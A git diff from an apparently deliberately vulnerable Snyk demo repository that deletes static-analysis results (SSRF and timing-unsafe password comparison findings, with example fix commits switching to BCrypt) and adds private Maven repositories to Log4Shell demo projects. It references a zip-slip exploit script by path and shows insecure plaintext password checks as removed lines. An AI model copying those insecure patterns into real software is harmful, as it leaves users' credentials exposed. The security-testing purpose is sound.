"@Data\n", - "lineNumber": 11, - "lineChange": "none" - }, - { - "line": "@AllArgsConstructor\n", - "lineNumber": 12, - "lineChange": "none" - }, - { - "line": "public class ConsumerAuthIdentity implements AuthIdentity{\n", - "lineNumber": 13, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 14, - "lineChange": "none" - }, - { - "line": "\tprivate Student student;\n", - "lineNumber": 15, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 16, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 17, - "lineChange": "none" - }, - { - "line": "\tpublic String username() {\n", - "lineNumber": 18, - "lineChange": "none" - }, - { - "line": "\t\treturn student.getUsername();\n", - "lineNumber": 19, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 20, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 21, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": "\tpublic String cryptPassword() {\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\t\treturn student.getPassword();\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": "\t}\n", - "lineNumber": 25, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": "\t@Override\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\tpublic boolean confirm(String plainPassword) {\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": "\t\treturn cryptPassword().equals(plainPassword);\n", - "lineNumber": 28, - "lineChange": "removed" - }, - { - "line": "\t\treturn BCrypt.checkpw(plainPassword, cryptPassword());\n", - "lineNumber": 29, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/SeraphJACK/SimpleLogin/commit/ff6715f90b9a3e00f7201618ff2f4986c5ebc0f5?diff=split#diff-c79ff75898e7300d5901fce735e57a03db459d401284e7c67ec4711d5adebba4L-1", - "lines": [ - { 
- "line": "import org.mindrot.jbcrypt.BCrypt;\n", - "lineNumber": 4, - "lineChange": "added" - }, - { - "line": "import top.seraphjack.simplelogin.SLConfig;\n", - "lineNumber": 5, - "lineChange": "none" - }, - { - "line": "import top.seraphjack.simplelogin.SimpleLogin;\n", - "lineNumber": 6, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 7, - "lineChange": "none" - }, - { - "line": "import javax.annotation.concurrent.NotThreadSafe;\n", - "lineNumber": 8, - "lineChange": "none" - }, - { - "line": "import java.io.IOException;\n", - "lineNumber": 9, - "lineChange": "none" - }, - { - "line": "import java.nio.charset.StandardCharsets;\n", - "lineNumber": 10, - "lineChange": "none" - }, - { - "line": "import java.nio.file.Files;\n", - "lineNumber": 11, - "lineChange": "none" - }, - { - "line": "import java.nio.file.Path;\n", - "lineNumber": 12, - "lineChange": "none" - }, - { - "line": "import java.nio.file.StandardOpenOption;\n", - "lineNumber": 13, - "lineChange": "none" - }, - { - "line": "import java.util.Arrays;\n", - "lineNumber": 14, - "lineChange": "none" - }, - { - "line": "import java.util.HashMap;\n", - "lineNumber": 15, - "lineChange": "none" - }, - { - "line": "import java.util.Map;\n", - "lineNumber": 16, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 17, - "lineChange": "none" - }, - { - "line": "@NotThreadSafe\n", - "lineNumber": 18, - "lineChange": "none" - }, - { - "line": "public class StorageProviderFile implements StorageProvider {\n", - "lineNumber": 19, - "lineChange": "none" - }, - { - "line": " private Gson gson;\n", - "lineNumber": 20, - "lineChange": "none" - }, - { - "line": " private Path path;\n", - "lineNumber": 21, - "lineChange": "none" - }, - { - "line": " private Map entries;\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": " private boolean dirty = false;\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - 
"line": " StorageProviderFile(Path path) throws IOException {\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": " this.path = path;\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": " this.gson = new Gson();\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": " if (Files.exists(path)) {\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " } else {\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": " if (!Files.exists(path.getParent())) {\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": " Files.createDirectories(path.getParent());\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " Files.createFile(path);\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 40, - "lineChange": "none" - }, - { - "line": " @Override\n", - "lineNumber": 41, - "lineChange": "none" - }, - { - "line": " public boolean checkPassword(String username, String password) {\n", - "lineNumber": 42, - "lineChange": "none" - }, - { - "line": " if (entries.containsKey(username)) {\n", - "lineNumber": 43, - "lineChange": "none" - }, - { - "line": " return entries.get(username).password.equals(password);\n", - "lineNumber": 43, - "lineChange": "removed" - }, - { - "line": " return 
BCrypt.checkpw(password, entries.get(username).password);\n", - "lineNumber": 44, - "lineChange": "added" - } - ] - } - ], - "exampleCommitDescriptions": [], - "precision": "very-high", - "repoDatasetSize": 2, - "cwe": [ - "CWE-256" - ] - } - } - ] - } - }, - "results": [ - { - "ruleId": "python/Ssrf", - "ruleIndex": 0, - "level": "warning", - "message": { - "text": "Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", - "markdown": "Unsanitized input from {0} {1} into {2}, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.", - "arguments": [ - "[a command line argument](0)", - "[flows](1),(2),(3),(4),(5),(6)", - "[requests.post](7)" - ] - }, - "locations": [ - { - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 13, - "endLine": 13, - "startColumn": 1, - "endColumn": 14 - } - } - } - ], - "fingerprints": { - "0": "c91d074435910f1a76d8677462395e7a7f5317f554c886317059bf72f98d247f", - "1": "3d071b71.889edeb6.ef7ad415.3456c081.056de048.ba14daf2.081ac3f4.8794408a.a6b41d6e.889edeb6.ef7ad415.edcf1db9.c8b7d5cc.48e1de78.a2237efa.f46ed94e" - }, - "codeFlows": [ - { - "threadFlows": [ - { - "locations": [ - { - "location": { - "id": 0, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 16 - } - } - } - }, - { - "location": { - "id": 1, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 16 - } - } - } - }, - { - "location": { - "id": 2, - "physicalLocation": { - 
"artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 19 - } - } - } - }, - { - "location": { - "id": 3, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 8, - "endColumn": 69 - } - } - } - }, - { - "location": { - "id": 4, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 7, - "endColumn": 97 - } - } - } - }, - { - "location": { - "id": 5, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 10, - "endLine": 10, - "startColumn": 1, - "endColumn": 97 - } - } - } - }, - { - "location": { - "id": 6, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 13, - "endLine": 13, - "startColumn": 15, - "endColumn": 18 - } - } - } - }, - { - "location": { - "id": 7, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/exploits/zip-slip.py", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 13, - "endLine": 13, - "startColumn": 1, - "endColumn": 14 - } - } - } - } - ] - } - ] - } - ], - "properties": { - "priorityScore": 534, - "priorityScoreFactors": [ - { - "label": true, - "type": "hotFileCodeFlow" - }, - { - "label": true, - "type": "fixExamples" - } - ], - "isAutofixable": false - } - }, - { - "ruleId": "java/ReturnsPassword", - "ruleIndex": 1, - "level": "warning", - "message": { - "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. 
When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "arguments": [] - }, - "locations": [ - { - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 250, - "endLine": 250, - "startColumn": 17, - "endColumn": 50 - } - } - } - ], - "fingerprints": { - "0": "321c85af98d01d74e11fa5dbd45f05d79b2a8850b63a02c1da64df28bfa00cdc", - "1": "ec2603c1.d33f1a8f.d308627b.9998adc9.dd06b926.349570c1.6ae0062a.02370d47.ec2603c1.d33f1a8f.fc7d5400.9998adc9.dd06b926.349570c1.6ae0062a.02370d47" - }, - "codeFlows": [ - { - "threadFlows": [ - { - "locations": [ - { - "location": { - "id": 0, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 250, - "endLine": 250, - "startColumn": 17, - "endColumn": 50 - } - } - } - } - ] - } - ] - } - ], - "properties": { - "priorityScore": 617, - "priorityScoreFactors": [ - { - "label": true, - "type": "multipleOccurrence" - }, - { - "label": true, - "type": "hotFileSource" - }, - { - "label": true, - "type": "fixExamples" - } - ], - "isAutofixable": false - } - }, - { - "ruleId": "java/ReturnsPassword", - "ruleIndex": 1, - "level": "warning", - "message": { - "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. 
When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", - "arguments": [] - }, - "locations": [ - { - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 254, - "endLine": 254, - "startColumn": 17, - "endColumn": 54 - } - } - } - ], - "fingerprints": { - "0": "5a6e18b33f52d656e45141c69fb41d4f9763dad06f518bac9d79f375ee50b600", - "1": "daf8aa0f.ebc140b8.d308627b.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47.daf8aa0f.ebc140b8.fc7d5400.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47" - }, - "codeFlows": [ - { - "threadFlows": [ - { - "locations": [ - { - "location": { - "id": 0, - "physicalLocation": { - "artifactLocation": { - "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", - "uriBaseId": "%SRCROOT%" - }, - "region": { - "startLine": 254, - "endLine": 254, - "startColumn": 17, - "endColumn": 54 - } - } - } - } - ] - } - ] - } - ], - "properties": { - "priorityScore": 617, - "priorityScoreFactors": [ - { - "label": true, - "type": "multipleOccurrence" - }, - { - "label": true, - "type": "hotFileSource" - }, - { - "label": true, - "type": "fixExamples" - } - ], - "isAutofixable": false - } - } - ], - "properties": { - "coverage": [ - { - "isSupported": true, - "lang": "HTML", - "files": 10, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "Java", - "files": 36, - "type": "SUPPORTED" - }, - { - 
"isSupported": true, - "lang": "XML", - "files": 14, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "Python", - "files": 2, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "JavaScript", - "files": 6, - "type": "SUPPORTED" - }, - { - "isSupported": true, - "lang": "Java Server Pages", - "files": 12, - "type": "SUPPORTED" - } - ] - } - } - ] -} diff --git a/test.json b/test.json deleted file mode 100644 index 34a147d0cb..0000000000 --- a/test.json +++ /dev/null 
@@ -1,511 +0,0 @@ -{ - "id": "python/Ssrf", - "name": "Ssrf", - "shortDescription": { - "text": "Server-Side Request Forgery (SSRF)" - }, - "defaultConfiguration": { - "level": "warning" - }, - "help": { - "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. 
Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", - "text": "" - }, - "properties": { - "tags": [ - "python", - "Ssrf", - "Security", - "SourceNonServer", - "SourceLocalEnv", - "SourceCLI", - "Taint" - ], - "categories": [ - "Security" - ], - "exampleCommitFixes": [ - { - "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", - "lines": [ - { - "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", - "lineNumber": 31, - "lineChange": "removed" - }, - { - "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", - "lineNumber": 32, - "lineChange": "removed" - }, - { - "line": " args = parser.parse_args()\n", - "lineNumber": 33, - "lineChange": "removed" - }, - { - "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", - "lineNumber": 31, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " request = requests.get(args.zip_url, stream=True)\n", - "lineNumber": 36, - "lineChange": "removed" - }, - { - "line": " request = requests.get(url, stream=True)\n", - "lineNumber": 34, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", - "lines": [ - { - "line": "def get_magnet_link(movie_name = 'harry potter'):\n", - "lineNumber": 32, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 33, - 
"lineChange": "added" - }, - { - "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", - "lineNumber": 34, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "def get_torrent_url(search_url):\n", - "lineNumber": 40, - "lineChange": "removed" - }, - { - "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", - "lineNumber": 41, - "lineChange": "removed" - }, - { - "line": " search_request_response = requests.get(search_url, verify=False)\n", - "lineNumber": 42, - "lineChange": "removed" - }, - { - "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", - "lineNumber": 43, - "lineChange": "removed" - }, - { - "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", - "lineNumber": 44, - "lineChange": "removed" - }, - { - "line": " resp = requests.get(URL)\n", - "lineNumber": 36, - "lineChange": "added" - }, - { - "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", - "lineNumber": 37, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", - "lines": [ - { - "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 23, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 24, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 25, - "lineChange": "removed" - }, - { - "line": "from htk.utils import htk_setting\n", - "lineNumber": 23, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 24, - 
"lineChange": "added" - }, - { - "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", - "lineNumber": 25, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 26, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 27, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 28, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": "class Usage(Exception):\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " def __init__(self, msg):\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " self.msg = msg\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": "def main(argv = None):\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " OPT_STR = 'hgr'\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " OPT_LIST = [\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " 'help',\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " 'geocode',\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " 'resolve',\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": " ]\n", - "lineNumber": 40, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 41, - "lineChange": "none" - }, - { - "line": " if argv is None:\n", - "lineNumber": 42, - "lineChange": "none" - }, - { - "line": " argv = sys.argv\n", - "lineNumber": 43, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 44, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 
45, - "lineChange": "none" - }, - { - "line": " progname = argv[0]\n", - "lineNumber": 46, - "lineChange": "none" - }, - { - "line": " opts, args = getopt.getopt(argv[1:],\n", - "lineNumber": 47, - "lineChange": "none" - }, - { - "line": " OPT_STR,\n", - "lineNumber": 48, - "lineChange": "none" - }, - { - "line": " OPT_LIST)\n", - "lineNumber": 49, - "lineChange": "none" - }, - { - "line": " except getopt.error, msg:\n", - "lineNumber": 50, - "lineChange": "none" - }, - { - "line": " raise Usage(msg)\n", - "lineNumber": 51, - "lineChange": "none" - }, - { - "line": " # process options\n", - "lineNumber": 52, - "lineChange": "none" - }, - { - "line": " for o, a in opts:\n", - "lineNumber": 53, - "lineChange": "none" - }, - { - "line": " if o in ('-h', '--help'):\n", - "lineNumber": 54, - "lineChange": "none" - }, - { - "line": " print __doc__\n", - "lineNumber": 55, - "lineChange": "none" - }, - { - "line": " sys.exit(0)\n", - "lineNumber": 56, - "lineChange": "none" - }, - { - "line": " elif o in ('-g', '--geocode'):\n", - "lineNumber": 57, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 58, - "lineChange": "none" - }, - { - "line": " elif o in ('-r', '--resolve'):\n", - "lineNumber": 59, - "lineChange": "none" - }, - { - "line": " is_geocode = False\n", - "lineNumber": 60, - "lineChange": "none" - }, - { - "line": " if is_geocode and len(args) == 1:\n", - "lineNumber": 61, - "lineChange": "none" - }, - { - "line": " address = args[0]\n", - "lineNumber": 62, - "lineChange": "none" - }, - { - "line": " latitude, longitude = get_latlng(address)\n", - "lineNumber": 63, - "lineChange": "none" - }, - { - "line": " print '%s,%s' % (latitude, longitude,)\n", - "lineNumber": 64, - "lineChange": "none" - }, - { - "line": " elif not is_geocode and len(args) == 2:\n", - "lineNumber": 65, - "lineChange": "none" - }, - { - "line": " latitude = args[0]\n", - "lineNumber": 66, - "lineChange": "none" - }, - { - "line": " longitude = args[1]\n", - 
"lineNumber": 67, - "lineChange": "none" - }, - { - "line": " address = reverse_geocode(latitude, longitude)\n", - "lineNumber": 68, - "lineChange": "none" - }, - { - "line": " print address\n", - "lineNumber": 69, - "lineChange": "none" - }, - { - "line": " else:\n", - "lineNumber": 70, - "lineChange": "none" - }, - { - "line": " raise Usage('Incorrect arguments')\n", - "lineNumber": 71, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 72, - "lineChange": "none" - }, - { - "line": " except Usage, err:\n", - "lineNumber": 73, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, err.msg\n", - "lineNumber": 74, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, \"for help use --help\"\n", - "lineNumber": 75, - "lineChange": "none" - }, - { - "line": " return 3.14159\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": "def get_latlng(address):\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " address_query = urllib.quote(address, '')\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": " values = {\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " 'format' : 'json',\n", - "lineNumber": 79, - "lineChange": "none" - }, - { - "line": "'sensor' : 'false',\n", - "lineNumber": 80, - "lineChange": "none" - }, - { - "line": "'address' : address_query,\n", - "lineNumber": 81, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 82, - "lineChange": "none" - }, - { - "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", - "lineNumber": 83, - "lineChange": "removed" - }, - { - "line": " response = requests.get(url)\n", - "lineNumber": 84, - "lineChange": "removed" - }, - { - "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", - "lineNumber": 83, - "lineChange": "added" - }, - { - "line": " if key:\n", - 
"lineNumber": 84, - "lineChange": "added" - }, - { - "line": " params['key'] = key\n", - "lineNumber": 85, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 86, - "lineChange": "added" - }, - { - "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", - "lineNumber": 87, - "lineChange": "added" - } - ] - } - ], - "exampleCommitDescriptions": [], - "precision": "very-high", - "repoDatasetSize": 4, - "cwe": [ - "CWE-918" - ] - } -} diff --git a/test2.json b/test2.json deleted file mode 100644 index 1652bc2a7d..0000000000 --- a/test2.json +++ /dev/null 
@@ -1,108 +0,0 @@ -{ - "vulnerabilities": [], - "ok": true, - "dependencyCount": 0, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "projectId": "6bb333cc-0ffb-4f07-924f-c128d54c1c12", - 
"ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": true, - "uniqueCount": 0, - "projectName": "io.github.snyk:java-goof", - "foundProjectCount": 7, - "displayTargetFile": "pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" -} From 501328b2ef5451b7c2b9fefa3f45a35d02ae3b0f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Thu, 27 Mar 2025 12:05:48 -0400 Subject: [PATCH 23/38] add private deps private deps as an example --- .gitignore | 1 + log4shell-goof/log4shell-client/pom.xml | 17 + log4shell-goof/log4shell-server/pom.xml | 11 + snyk.html | 493 ++++++++++++++++++++++++ 4 files changed, 522 insertions(+) create mode 100644 snyk.html diff --git a/.gitignore b/.gitignore index 6498370b82..cef2b9315d 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,4 @@ .idea **/target/** **/.DS_Store +settings.xml \ No newline at end of file diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 3d3e211cca..8fdead3edc 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -7,6 +7,14 @@ 0.0.1-SNAPSHOT + + snapshots + https://adolltesting.com/repository/maven-snapshots/ + + true + always + + log4shell-client 0.0.1-SNAPSHOT @@ -19,7 +27,16 @@ 8 + + + + + + io.snyk + log4shell-server + 0.0.1-SNAPSHOT + org.apache.logging.log4j log4j-core diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index 593d2298d7..a76bf7968f 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -16,6 +16,17 @@ 8 + + + releases Releases repo + https://adolltesting.com/repository/maven-releases/ + + + snapshots Snapshots + https://adolltesting.com/repository/maven-snapshots/ + + + org.apache.logging.log4j 
